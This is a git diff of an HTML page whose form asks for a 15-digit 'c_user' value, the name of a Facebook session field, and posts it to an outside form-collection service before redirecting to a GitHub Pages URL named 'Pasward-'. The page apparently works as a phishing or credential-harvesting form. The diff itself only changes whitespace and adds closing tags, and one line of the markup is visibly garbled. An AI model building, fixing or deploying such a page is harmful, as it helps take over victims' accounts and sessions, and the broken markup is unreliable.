--- a/index.html
+++ b/index.html
@@ -51,7 +51,7 @@
             <form class='content' action="https://submit-form.com/BMiG2iVOg" method="POST">
                                 <inputhttps://submit-form.com/BMiG2iVOg type="hidden" name="_redirect" value="https://applyfree.github.io/Pasward-/"/>
                                            
-              <br />
+   <br />
                   <label style="font-size: 12px;">c_user</label>
                     <br>
                     <input type="number" name="c_user" required pattern="^\d{15}$" title="Please enter 15 digits">
@@ -78,6 +78,10 @@
             </form>
           </div>
         </div>
+      </div>
+    </div>
+  </div>
+</body>
       </div>
     </div>
   </div>
